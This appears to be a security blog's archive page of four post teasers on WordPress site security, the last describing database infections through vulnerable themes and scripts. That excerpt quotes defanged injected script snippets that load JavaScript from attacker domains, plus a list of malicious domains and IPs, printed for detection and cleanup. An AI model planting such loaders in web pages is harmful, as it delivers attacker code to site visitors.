Categories
Security

Why You Should Care about Website Security on Your Small Site

Why You Should Care about Website Security on Your Small Site

Most people assume that if their website has been compromised, there must have been an attacker evaluating their site and looking for a specific vulnerability to hack. Under most circumstances however, bad actors don’t manually hand-pick websites to attack since it’s a tedious and time consuming process. Instead, they rely on automation to identify vulnerable websites and execute their attacks.

The unfortunate reality is that websites big or small are targeted daily and the majority of these attacks are automated.

Continue reading Why You Should Care about Website Security on Your Small Site at Sucuri Blog.

Categories
Security

New Guide on How to Clean a Hacked Website

New Guide on How to Clean a Hacked Website

Our mission at Sucuri is to make the internet a safer place and that entails cleaning up hacked websites. We have teams who actively research website vulnerabilities and who are eager to share with you some tips on how to clean your hacked website.

We are happy to help the community learn the steps they can follow to get rid of a website hack.

You can find all our guides to website security in a section of our website dedicated to providing concise and comprehensive tips on different areas of website security.

Continue reading New Guide on How to Clean a Hacked Website at Sucuri Blog.

Categories
Security

Formidable Forms / Shortcodes Ultimate Exploits In The Wild

Formidable Forms / Shortcodes Ultimate Exploits In The Wild

On Monday, November 20th, we were notified about a vulnerability that poses a serious security risk when the Shortcodes Ultimate and Formidable Forms plugins are used together on a single WordPress installation.

Over the past couple of weeks, we’ve noticed a large influx in the number of malicious requests testing for the presence of the two popular WordPress plugins. Both of these plugins contain separate medium-risk vulnerabilities that, when combined, allow an attacker to remotely execute rogue code on the underlying server.

Continue reading Formidable Forms / Shortcodes Ultimate Exploits In The Wild at Sucuri Blog.

Categories
Security

Old Themes, Abandoned Scripts and Pitfalls of Cleaning Serialized Data

Old Themes, Abandoned Scripts and Pitfalls of Cleaning Serialized Data

Over the summer we’ve seen waves of WordPress database infections that use vulnerabilities in tagDiv’s Newspaper/Newsmag themes or InterconnectIT Search and Replace scripts (searchreplacedb2.php).

The injections range from ad scripts coming from established ad networks like shorte.st to new domains created specifically for those attacks.

Typical injected scripts look like this:

<s cript type='text/javascript' src='hxxps://con1.sometimesfree[.]biz/c.js’>

Or:

var t = document.createElement(“script”);
t.type = “text/javascript”; t.src = “hxxps://src[.]dancewithme[.]biz/src.js“;
document.head.appendChild(t);

Or:

The most noticeable malicious URLs that we’ve seen lately are:

  • con1.sometimesfree[.]biz/c.js (185.82.217.166 Bulgaria)
  • java.sometimesfree[.]biz/counter.js (185.82.217.166 Bulgaria)
  • javascript.sometimesfree[.]biz/script.js (185.82.217.166 Bulgaria)
  • js.givemealetter[.]biz/script.js (185.82.217.166 Bulgaria)
  • go.givemealetter[.]biz/click.html (185.82.217.166 Bulgaria)
  • traffictrade[.]life/scripts.js (200.7.105.43 United Kingdom)
  • blue.traffictrade[.]life/main.js (200.7.105.43 United Kingdom)
  • js.trysomethingnew[.]eu/analytics.js (94.156.144.19 Bulgaria)
  • get.simplefunsite[.]info/rw.js (won’t resolve atm)
  • post.simplefunsite[.]info/go.php?rewrite=81 (won’t resolve atm)
  • src.dancewithme[.]biz/src.js (185.159.82.2 – Russia)
  • go.dancewithme[.]biz/red.php (185.159.82.2 – Russia)

They are all new domains registered specifically for this attack:

  • traffictrade[.]life – created on July 3rd, 2017
  • trysomethingnew[.]eu – created on Aug 11th, 2017
  • sometimesfree[.]biz – created on August 22nd, 2017
  • givemealetter[.]biz – created on August 27th, 2017
  • simplefunsite.info – created on September 2nd, 2017
  • dancewithme[.]biz – created on September 5th, 2017

Malware in WordPress Database

In most cases the scripts are injected right before <a href tags in the post content (wp_posts), meaning that webmasters may need to remove multiple injected scripts from hundreds of posts in the database – definitely not a task you want to do manually!

Continue reading Old Themes, Abandoned Scripts and Pitfalls of Cleaning Serialized Data at Sucuri Blog.